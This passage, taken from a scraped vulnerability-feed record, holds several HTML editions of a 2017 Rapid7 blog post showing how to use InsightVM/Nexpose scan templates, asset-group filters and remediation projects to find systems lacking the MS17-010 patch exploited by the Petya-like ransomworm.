src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 
0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. 
If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:ef999f6f-5339-4887-b822-6763b7e99b36] -->", "published": "2017-06-28T02:25:32", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "lastseen": "2017-06-28T06:20:00", "viewCount": 43, "enchantments": {}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.4", "references": []}}, {"lastseen": "2017-06-30T19:17:17", "differentElements": ["description", "modified", "published"], "edition": 3, "bulletin": {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [], "modified": "2017-06-30T15:40:50", "type": "rapid7community", "description": "<!-- [DocumentBodyStart:4cc42a3f-1295-4630-8a24-898587c6b2dc] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. 
It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img 
alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". 
Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" 
href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan with it to identify every scanned asset that is still missing the MS17-010 patch. Only assets the scan engine can reach are reported, so make sure the scan scope covers all of the Windows systems you are responsible for.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the six MS17-010 CVEs listed in step 4 above (CVE-2017-0143 through CVE-2017-0148), as shown below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" 
data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 
0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the MS17-010 vulnerabilities this ransomworm uses to spread laterally. Note that this covers only the lateral-movement vector: patching MS17-010 limits the worm&#8217;s spread but does not address the initial infection vector described above, and further CVEs may be added to this guidance as more becomes known. 
If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:4cc42a3f-1295-4630-8a24-898587c6b2dc] -->", "published": "2017-06-30T15:40:50", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "lastseen": "2017-06-30T19:17:17", "viewCount": 138, "enchantments": {}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.4", "references": []}}], "modified": "2017-08-03T16:56:04", "lastseen": "2017-08-03T17:21:32", "published": "2017-08-03T16:56:04", "description": "<!-- [DocumentBodyStart:880a7067-953c-4d86-bb9f-22e02d26586e] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. 
It is believed that the ransomworm achieved its initial infection via a compromised software update, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; 
color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img 
alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". 
Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" 